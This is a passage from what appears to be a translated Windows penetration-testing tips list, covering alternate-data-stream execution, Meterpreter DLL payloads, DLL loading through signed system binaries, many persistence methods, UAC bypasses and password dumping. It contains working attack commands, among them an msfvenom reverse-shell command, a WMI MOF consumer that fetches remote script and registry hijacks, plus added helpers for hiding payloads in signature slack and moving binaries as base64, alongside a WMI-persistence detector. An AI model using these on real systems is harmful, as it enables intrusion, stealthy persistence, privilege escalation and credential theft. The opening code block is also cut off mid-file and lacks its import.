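from typing import Dict, List, Optional, Tuple

# Added example, not from the original README. Authenticode hashes the file
# minus the checksum field, the Security directory entry and the certificate
# table, so bytes hidden inside the table (within WIN_CERTIFICATE.dwLength but
# after the PKCS#7 SignedData) leave the signature intact. The PE image built
# below is a constructed stub, not a real signed file.
SECURITY_DIR = 4


def security_directory(pe: bytes) -> Tuple[int, int]:
    """(file offset, size) of the certificate table; (0, 0) when unsigned."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                                   # after the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)              # PE32 vs PE32+ data directories
    if struct.unpack_from("<I", pe, dirs - 4)[0] <= SECURITY_DIR:   # NumberOfRvaAndSizes
        return 0, 0
    return struct.unpack_from("<II", pe, dirs + 8 * SECURITY_DIR)   # a raw file offset, not an RVA


def der_total_length(blob: bytes) -> int:
    """Bytes occupied by the outer DER SEQUENCE (tag + length + content)."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("certificate body is not a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:                      # short form
        return 2 + first
    n = first & 0x7F                      # long form: n length bytes follow
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def find_certificate_slack(pe: bytes) -> List[Dict[str, object]]:
    """One record per WIN_CERTIFICATE entry; `slack` holds any bytes beyond the
    PKCS#7 blob that are not plain 8-byte alignment padding."""
    off, size = security_directory(pe)
    end, out = off + size, []
    while off and off + 8 <= end:
        dw_length, revision, cert_type = struct.unpack_from("<IHH", pe, off)
        if dw_length < 8:
            break
        body = pe[off + 8: off + dw_length]
        used = der_total_length(body)
        tail = body[used:]
        padding = len(tail) < 8 and tail == b"\x00" * len(tail)
        out.append({"offset": off, "revision": revision, "type": cert_type,
                    "declared": len(body), "pkcs7": used, "slack": b"" if padding else tail})
        off += (dw_length + 7) & ~7          # entries are 8-byte aligned
    return out


def build_stub_pe(cert_blob: Optional[bytes]) -> bytes:
    """Headers-only PE32 image with `cert_blob` as its certificate table (constructed)."""
    dos = b"MZ".ljust(0x3C, b"\x00") + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)     # i386, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    table = b""
    if cert_blob is not None:
        entry = struct.pack("<IHH", 8 + len(cert_blob), 0x200, 2) + cert_blob   # revision 2.0, PKCS_SIGNED_DATA
        table = entry + b"\x00" * (-len(entry) % 8)
        struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR, len(dos) + 4 + len(coff) + len(opt), len(table))
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Dummy "signature": a 300-byte DER SEQUENCE standing in for a real PKCS#7 blob.
FAKE_PKCS7 = b"\x30\x82" + struct.pack(">H", 300) + b"\xAA" * 300
```

`find_certificate_slack(open(path, "rb").read())` on a real signed binary returns an empty `slack` for a clean file; a non-empty one is the carved payload, and the `offset` tells you where to cut it from.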
#### Method 3: Special ADS
(1) ...
```
type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
```
(2) Special COM files
```
type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
```
(3) Disk root directory
```
type putty.exe >C:\:putty.exe
wmic process call create C:\:putty.exe
```
Reference:
[《Advanced Exploitation of Hidden Alternate Data Streams》](https://3gstudent.github.io/Hidden-Alternative-Data-Streams%E7%9A%84%E8%BF%9B%E9%98%B6%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7)
---
### Tips 27. Information worth collecting in Windows system
#### (1) Registered WMI information
```
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list
```
Administrators may register WMI subscriptions of their own to record an attacker's WMI activity; the commands above list them, and of course such monitoring can also be removed with wmic. (For the defender this cuts both ways: baseline root\subscription and alert on changes to it rather than trusting a single snapshot.)
Reference:
[《Study Notes Weekly No.1 (Monitor WMI & ExportsToC++ & Use DiskCleanup bypass UAC)》](https://3gstudent.github.io/Study-Notes-Weekly-No.1(Monitor-WMI_ExportsToC++_Use-DiskCleanup-bypass-UAC))
#### (2) Computer Name
```
wmic /node:192.168.1.10 /user:"administrator" /password:"123456" /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem get CSName
```
---
### Tips 28. Meterpreter under Windows
#### Method 1: Loading dll via rundll32
msf:
```
msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080 > ./a.dll
```
Generate a.dll and upload it to the host.
Execute `rundll32.exe a.dll, Control_RunDLL`
#### Method 2: Via cpl
https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp
Generate dll, rename it to cpl, double click to execute
#### Method 3: Via powershell
https://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1
---
### Tips 29. How to load dll in Windows system
#### Method 1: rundll32
```
rundll32 a.dll,EntryPoint
```
#### Method 2: regsvr32
```
regsvr32 a.dll
```
Reference:
《Code Execution of Regsvr32.exe》
#### Method 3: odbcconf
```
odbcconf.exe /a {regsvr c:\test\odbcconf.dll}
```
Reference:
[《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》](https://3gstudent.github.io/Study-Notes-Weekly-No.3(Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger))
#### Method 4: Tracker
```
Tracker.exe /d test.dll /c svchost.exe
```
Tracker.exe (shipped with MSBuild) carries a Microsoft digital signature, so it can load a DLL where an application whitelist trusts Microsoft-signed binaries.
Reference:
[《Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)》](https://3gstudent.github.io/Study-Notes-Weekly-No.4(Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file))
#### Method 5: Excel.Application object's RegisterXLL() method
Prerequisite: Microsoft Office software is installed
1.rundll32
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();
```
2.js
```
var excel = new ActiveXObject("Excel.Application");
excel.RegisterXLL("C:\\test\\messagebox.dll");
```
3.powershell
```
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL("C:\test\messagebox.dll")
```
Reference:
[《Use Excel.Application object's RegisterXLL() method to load dll》](https://3gstudent.github.io/Use-Excel.Application-object's-RegisterXLL()-method-to-load-dll)
#### Method 6: xwizard.exe
Copy xwizard.exe from %windir%\system32\ to the new directory C:\x.
Rename msg.dll to xwizards.dll and save it at C:\x.
Command line execution:
```
xwizard processXMLFile 1.txt
```
It will load C:\x\xwizards.dll.
Reference:
[《Use xwizard.exe to load dll》](https://3gstudent.github.io/Use-xwizard.exe-to-load-dll)
---
### Tips 30. Windows Persistence
#### Method 1: bitsadmin
```
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
```
Reference:
《Use bitsadmin to maintain persistence and bypass Autoruns》
#### Method 2: mof
```
pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
```
Administrator privileges:
```
mofcomp test.mof
```
Reference:
《WSC、JSRAT and WMI Backdoor》
#### Method 3: wmic
Execute notepad.exe every 60 seconds:
```
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
```
Reference:
[《Study Notes of WMI Persistence using wmic.exe》](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe)
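Both the MOF and the wmic variants above leave the same three objects in root\subscription, and those objects are what a hunt should look for. The following Python is an added example, not code from the original README or the referenced notes: it parses `wmic ... /FORMAT:list` output for the filter, consumer and binding classes (the query form used in Tips 27), joins each binding to its filter and consumer, and reports the bindings a defender would want to look at: script consumers, command-line consumers pointing at scripting hosts or remote content, and timer-style triggers such as polling `__InstanceModificationEvent` with `WITHIN` or watching Win32_LocalTime. The sample output is constructed: the BotFilter82/BotConsumer23 and filtP1/consP1 instances reproduce the objects the commands above create, and the SCM Event Log pair stands in for the binding Windows ships by default.

```python
import re
from typing import Dict, List

# Added example, not from the original README. Input is the text of
#   wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET Name,Query /FORMAT:list
#   wmic /NAMESPACE:"\\root\subscription" PATH <ConsumerClass> GET __CLASS,Name,... /FORMAT:list
#   wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET Filter,Consumer /FORMAT:list
# The samples are constructed to match that layout (one Key=Value per line,
# instances separated by blank lines).
FILTERS_OUT = """
Name=BotFilter82
Query=SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'


Name=filtP1
Query=Select * From __InstanceModificationEvent Where TargetInstance Isa "Win32_LocalTime" And TargetInstance.Second = 1


Name=SCM Event Log Filter
Query=select * from MSFT_SCMEventLogEvent
"""
CONSUMERS_OUT = """
__CLASS=CommandLineEventConsumer
Name=BotConsumer23
ExecutablePath=C:\\Windows\\System32\\notepad.exe
CommandLineTemplate=C:\\Windows\\System32\\notepad.exe


__CLASS=ActiveScriptEventConsumer
Name=consP1
ScriptingEngine=JScript
ScriptText=GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")


__CLASS=NTEventLogEventConsumer
Name=SCM Event Log Consumer
"""
BINDINGS_OUT = """
Consumer=CommandLineEventConsumer.Name="BotConsumer23"
Filter=__EventFilter.Name="BotFilter82"


Consumer=ActiveScriptEventConsumer.Name="consP1"
Filter=__EventFilter.Name="filtP1"


Consumer=NTEventLogEventConsumer.Name="SCM Event Log Consumer"
Filter=__EventFilter.Name="SCM Event Log Filter"
"""

LOLBIN = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta|regsvr32|rundll32|certutil|bitsadmin|msbuild)(\.exe)?\b", re.I)
REMOTE = re.compile(r"https?://|script:|\\\\", re.I)   # URL, script moniker, UNC path
_REF = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]*)"$')


def parse_wmic_list(text: str) -> List[Dict[str, str]]:
    """Turn /FORMAT:list output into one dict per instance."""
    instances, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                instances.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")      # values (e.g. WQL) may contain '=' themselves
        current[key.strip()] = value.strip()
    if current:
        instances.append(current)
    return instances


def audit_subscriptions(filters, consumers, bindings) -> List[Dict[str, object]]:
    """Join each binding to its filter and consumer and return the suspicious ones."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    findings = []
    for b in bindings:
        fm, cm = _REF.match(b.get("Filter", "")), _REF.match(b.get("Consumer", ""))
        if not fm or not cm:
            continue
        f = by_filter.get(fm["name"], {})
        c = by_consumer.get((cm["cls"], cm["name"]), {})
        cmd = c.get("CommandLineTemplate") or c.get("ExecutablePath", "")
        script = c.get("ScriptText", "")
        query = f.get("Query", "")
        reasons = []
        if cm["cls"] == "ActiveScriptEventConsumer":
            reasons.append("script consumer runs " + script[:60])
        if LOLBIN.search(cmd) or REMOTE.search(cmd + script):
            reasons.append("scripting host or remote content: " + (cmd or script)[:60])
        if re.search(r"\bWITHIN\s+\d+", query, re.I) and "__Instance" in query:
            reasons.append("polling trigger: " + query[:60])
        if "Win32_LocalTime" in query:
            reasons.append("clock-tick trigger: " + query[:60])
        if reasons:
            findings.append({"filter": fm["name"], "consumer": f'{cm["cls"]}.{cm["name"]}', "reasons": reasons})
    return findings
```

The same join works on `Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding` output, and Sysmon events 19, 20 and 21 record the creation of each of the three objects, so the rules in `audit_subscriptions` can be applied to those events as they arrive instead of to a periodic wmic dump.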
#### Method 4: Userland Persistence With Scheduled Tasks
Hijack the scheduled task UserTask so that testmsg.dll is loaded at logon.
The operation is as follows:
Create a new key HKEY_CURRENT_USER\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}
Then create a subkey InprocServer32 under it
Set its default value to `c:\test\testmsg.dll`
Because HKCU\Software\Classes is consulted before HKLM\Software\Classes when HKCR is resolved, no administrator rights are needed.
Testmsg.dll contains the following export functions:
- DllCanUnloadNow
- DllGetClassObject
- DllRegisterServer
- DllUnregisterServer

Wait for the user to log in again.
Reference:
[《Userland registry hijacking》](https://3gstudent.github.io/Userland-registry-hijacking)
#### Method 5: Netsh
The helper DLL needs to include the export function InitHelperDll.
Administrator privileges:
```
netsh add helper c:\test\netshtest.dll
```After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called.
Reference:
[《Netsh persistence》](https://3gstudent.github.io/Netsh-persistence)
#### Method 6: Shim
Common ways:
- InjectDll
- RedirectShortcut
- RedirectEXE

Reference:
[《Application Compatibility Shims in Penetration Testing》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims)
#### Method 7: dll hijacking
Use Rattler to enumerate running processes automatically and find the ones that can be abused for DLL hijacking.
Example path:
- c:\windows\midimap.dll
Reference:
[《Testing Rattler, an Automated DLL Hijacking Identification Tool》](https://3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95)
#### Method 8: DoubleAgent
Write a custom Verifier provider DLL.
Install it through Application Verifier (registered for the target image under Image File Execution Options).
The DLL is injected into the target process and executes the payload.
Whenever the target process starts, the payload runs, which is equivalent to an auto-start mechanism.
Reference:
[《Application Verifier in Penetration Testing (Introduction to DoubleAgent)》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D))
#### Method 9: waitfor.exe
It does not start on its own at boot, but the waiting process can be triggered remotely (`waitfor /s <host> /si <signal>`), and the only visible process is waitfor.exe.
Reference:
[《Use Waitfor.exe to maintain persistence》](https://3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence)
#### Method 10: AppDomainManager
.NET programs can be hijacked by replacing their AppDomainManager (through the program's .config file or the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment variables).
If the startup of a .NET program the system uses routinely, such as powershell.exe, is hijacked this way and a payload is added to it, the result is a passively triggered backdoor.
Reference:
[《Use AppDomainManager to maintain persistence》](https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence)
#### Method 11: Office Add-ins
If Office is installed, an Office add-in can be configured as a passive backdoor.
Commonly used methods:
- Word WLL
- Excel XLL
- Excel VBA add-ins
- PowerPoint VBA add-ins

POC: https://github.com/3gstudent/Office-Persistence
Reference:
[《Use Office to maintain persistence》](https://3gstudent.github.io/Use-Office-to-maintain-persistence)
[《Office Persistence on x64 operating system》](https://3gstudent.github.io/Office-Persistence-on-x64-operating-system)
#### Method 12: CLR
A backdoor that needs no administrator privileges and can hijack every .NET program on the host.
POC: https://github.com/3gstudent/CLR-Injection
Reference:
[《Use CLR to maintain persistence》](https://3gstudent.github.io/Use-CLR-to-maintain-persistence)
#### Method 13: msdtc
Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.
Reference:
[《Use msdtc to maintain persistence》](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence)
#### Method 14: Hijack CAccPropServicesClass and MMDeviceEnumerator
No reboot and no administrator privileges required.
Implemented by modifying the registry.
POC: https://github.com/3gstudent/COM-Object-hijacking
Reference:
[《Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator》](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator)
#### Method 15: Hijack explorer.exe
No need to reboot the system, no administrator privileges required
Implemented by modifying the registry
Reference:
[《Use COM Object hijacking to maintain persistence——Hijack explorer.exe》](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe)
#### Method 16: Windows FAX DLL Injection
Hijack Explorer.exe through DLL search-order hijacking so that it loads a planted fxsst.dll.
Explorer.exe loads fxsst.dll at startup (a Fax service component; the service is enabled by default), normally from `c:\Windows\System32\fxsst.dll`.
Because Explorer.exe lives in c:\Windows and its own directory is searched before System32, saving payload.dll as c:\Windows\fxsst.dll makes Explorer.exe load the planted copy instead. Writing to c:\Windows requires administrator rights, which is why this is a persistence technique rather than an escalation.
The same idea:
Rename payload.dll to linkinfo.dll and hijack Explorer.exe to load linkinfo.dll.
#### Method 17: Hijack specific features of Office software
By DLL hijacking, the backdoor is triggered when Office performs certain functions.
Reference:
[《Using BDF to Implant a Backdoor into DLL Files》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8)
#### Method 18: Special Registry Keys
Create a registry key with a special name (e.g. one containing an embedded null character) that user-mode tools going through the Win32 API cannot open or display correctly, while the system can still process it through the Native API.
Reference:
[《Penetration Technique: Creating "Hidden" Registry Keys》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA)
[《Penetration Technique: More Tests on "Hidden" Registry Keys》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95)
#### Method 19: Powershell Configuration File
Modify the PowerShell profile script; the backdoor is triggered each time a PowerShell process starts.
Check whether a profile already exists:
```
Test-Path $profile
```
Create a profile:
```
New-Item -Path $profile -Type File -Force
```
Append a backdoor to the profile:
```
$string = 'Start-Process "cmd.exe"'
$string | Out-File -FilePath $profile -Append
```
`$profile` expands to the current user's `Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1` (for example `C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1`). Note that `powershell -NoProfile` (`-nop`, as used in several tips above) skips the profile, so the backdoor does not fire for such invocations.
From:
https://rastamouse.me/2018/03/a-view-of-persistence/
#### Method 20: XSL file loaded through wmic
Reference:
[《Analysis and Exploitation of Loading XSL Files via wmic》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8)
---
### Tips 31. UAC bypass
#### Method 1: use eventvwr.exe and registry hijacking
Applicable: Win7, Win8.1, Win 10
https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1
Reference:
[《Study Notes of WMI Persistence using wmic.exe》](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe)
[《Userland registry hijacking》](https://3gstudent.github.io/Userland-registry-hijacking)
#### Method 2: use sdclt.exe
For Win10
Reference:
[《Study Notes of using sdclt.exe to bypass UAC》](https://3gstudent.github.io/Study-Notes-of-using-sdclt.exe-to-bypass-UAC)
#### Method 3: use SilentCleanup
For Win8, Win10
```
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
```
Reference:
[《Study Notes of using SilentCleanup to bypass UAC》](https://3gstudent.github.io/Study-Notes-of-using-SilentCleanup-to-bypass-UAC)
#### Method 4: use wscript.exe
Only for Win7
https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
Reference:
[《Analysis of Invoke-WScriptBypassUAC in Empire》](https://3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90)
#### Method 5: use cmstp.exe
https://msitpros.com/?p=3960
Only for Win7
#### Method 5: Modify environment variables, hijack high-privilege .Net programs
For Win7-Win10
Eg. gpedit.msc
Modify the environment variables, use the CLR to hijack the boot process of gpedit.msc.
Reference:
[《Use CLR to bypass UAC》](https://3gstudent.github.io/Use-CLR-to-bypass-UAC)
#### Method 7: Modify the registry HKCU\Software\Classes\CLSID, hijack a high-privilege program
For Win7-Win10
- {B29D466A-857D-35BA-8712-A758861BFEA1}
- {D5AB5662-131D-453D-88C8-9BBA87502ADE}
- {0A29FF9E-7F9C-4437-8B11-F424491E3931}
- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}
Reference:
[《Use CLR to bypass UAC》](https://3gstudent.github.io/Use-CLR-to-bypass-UAC)
#### Method 8: Use COM components
Spoof the process's PEB so that it appears to be a trusted Windows process, then call an auto-elevating COM component to perform a privileged operation without a UAC prompt.
Reference:
[《Copying files with elevated privileges via the IFileOperation COM component》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6IFileOperation%E8%B6%8A%E6%9D%83%E5%A4%8D%E5%88%B6%E6%96%87%E4%BB%B6)
[《Disabling the firewall with elevated privileges via the NetFwPolicy2 COM component》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6NetFwPolicy2%E8%B6%8A%E6%9D%83%E5%85%B3%E9%97%AD%E9%98%B2%E7%81%AB%E5%A2%99)
[《Bypassing UAC via the IARPUninstallStringLauncher COM component》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6IARPUninstallStringLauncher%E7%BB%95%E8%BF%87UAC)
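Every method above assumes the same starting position: an account that is a member of Administrators, running with the filtered (medium-integrity) token UAC hands out, on a system where UAC is enabled but not set to "Always notify". The following pre-flight check is an added example, not code from the original page or from the referenced articles; it assumes English `whoami` output (the strings "deny only" and "Mandatory Level" are localised on non-English Windows) and the standard UAC policy values under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`.

```powershell
# Added example: report whether the current token is a UAC-bypass candidate.
# Assumption: English whoami output; registry value names are the documented UAC policy names.
function Get-UacBypassContext {
    $groups = whoami /groups
    # On a filtered admin token the Administrators SID is still listed, but as "Group used for deny only"
    $adminLine     = $groups | Select-String -SimpleMatch 'S-1-5-32-544' | Select-Object -First 1
    $isAdminMember = [bool]$adminLine
    $tokenFiltered = [bool]($adminLine -and ($adminLine.Line -match 'deny only'))
    # Integrity level comes from the "Mandatory Label\<Level> Mandatory Level" line
    $labelLine = ($groups | Select-String -SimpleMatch 'Mandatory Level' | Select-Object -First 1).Line
    $integrity = $labelLine -replace '^.*\\(\S+) Mandatory Level.*$', '$1'
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        AdminGroupMember           = $isAdminMember
        TokenFiltered              = $tokenFiltered
        IntegrityLevel             = $integrity                      # Low / Medium / High / System
        EnableLUA                  = $pol.EnableLUA                  # 0 = UAC disabled entirely
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin # 2 = Always notify, 5 = default, 0 = elevate silently
        PromptOnSecureDesktop      = $pol.PromptOnSecureDesktop
        # A bypass only makes sense here: admin account, filtered token, UAC on but not at "Always notify"
        BypassCandidate            = $isAdminMember -and $tokenFiltered -and
                                     ($pol.EnableLUA -eq 1) -and ($pol.ConsentPromptBehaviorAdmin -ne 2)
    }
}
Get-UacBypassContext | Format-List
```

If `TokenFiltered` is false while `AdminGroupMember` is true, the shell is already elevated and no bypass is needed; if `AdminGroupMember` is false, none of the methods in this section applies and a real local privilege escalation is required instead.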
---
### Tips 32. An exe or DLL built with Visual Studio fails on another system, reporting that a DLL is missing.
The missing DLL is usually the Visual C++ runtime. Workaround: link the runtime statically so the program does not depend on the redistributable being installed.
Project menu -> Project Properties -> C/C++ -> Code Generation -> Runtime Library, select Multi-threaded (/MT).
---
### Tips 33. Use LaZagne to export passwords stored by common applications on the current system.
LaZagne exports passwords saved by common applications on the current system (browsers, Wi-Fi, Git, Outlook, etc.):
https://github.com/AlessandroZ/LaZagne
You can also extend the LaZagne source code to export passwords from other applications.
Reference:
[《Developing custom scripts for the local password viewer LaZagne》](https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91)
---
### Tips 34. Use powershell to read and write files
Read a text file:
```
$file = Get-Content "1.txt"
```
Write a text file:
```
Set-Content -Path "1.txt" -Value $file
```
Read a binary file:
```
$fileContentBytes = [System.IO.File]::ReadAllBytes('1.exe')
```
Write a binary file:
```
[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)
```
**Note:**
The .NET `File` methods resolve relative paths against the process working directory, not against PowerShell's current location, so pass absolute paths to them.
---
### Tips 35. powershell for base64 encoding/decoding
Encoding (the input is a byte array, e.g. the result of `ReadAllBytes`):
```
$encoded = [System.Convert]::ToBase64String($fileContent)
```
Decoding (returns a byte array that can be written back with `WriteAllBytes`):
```
$fileContent = [System.Convert]::FromBase64String($encoded)
```
Reference:
[《Study Notes of using BGInfo to bypass Application Whitelisting》](https://3gstudent.github.io/Study-Notes-of-using-BGInfo-to-bypass-Application-Whitelisting)
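The usual reason to combine Tips 34 and 35 is to move a binary through a text-only channel. The following pair of functions is an added example, not code from the original page; it wraps the read/write and encode/decode calls above and verifies the copy with a SHA-256 hash. File names in the usage lines are placeholders.

```powershell
# Added example: transfer a binary as base64 text and verify the copy on the far side.
function ConvertTo-Base64File {
    param([string]$Path, [string]$OutFile)
    # .NET File APIs resolve relative paths against the process working directory,
    # not PowerShell's current location, so turn both paths into provider paths first
    $in  = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path)
    $out = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutFile)
    $b64 = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes($in))
    # Write plain ASCII without BOM or trailing newline; Out-File's default UTF-16 output breaks a straight paste
    [System.IO.File]::WriteAllText($out, $b64, [System.Text.Encoding]::ASCII)
    # Return the hash of the original so the receiving side can check the copy
    (Get-FileHash -LiteralPath $in -Algorithm SHA256).Hash
}

function ConvertFrom-Base64File {
    param([string]$Path, [string]$OutFile, [string]$ExpectedSha256)
    $in  = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path)
    $out = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutFile)
    # Trim whitespace picked up while pasting the text
    $bytes = [System.Convert]::FromBase64String(([System.IO.File]::ReadAllText($in)).Trim())
    [System.IO.File]::WriteAllBytes($out, $bytes)
    $actual = (Get-FileHash -LiteralPath $out -Algorithm SHA256).Hash
    if ($ExpectedSha256 -and $actual -ne $ExpectedSha256) {
        throw "SHA256 mismatch: got $actual, expected $ExpectedSha256"
    }
    $actual
}

# Usage (placeholder file names):
# $hash = ConvertTo-Base64File -Path .\1.exe -OutFile .\1.txt
# ConvertFrom-Base64File -Path .\1.txt -OutFile .\1_copy.exe -ExpectedSha256 $hash
```

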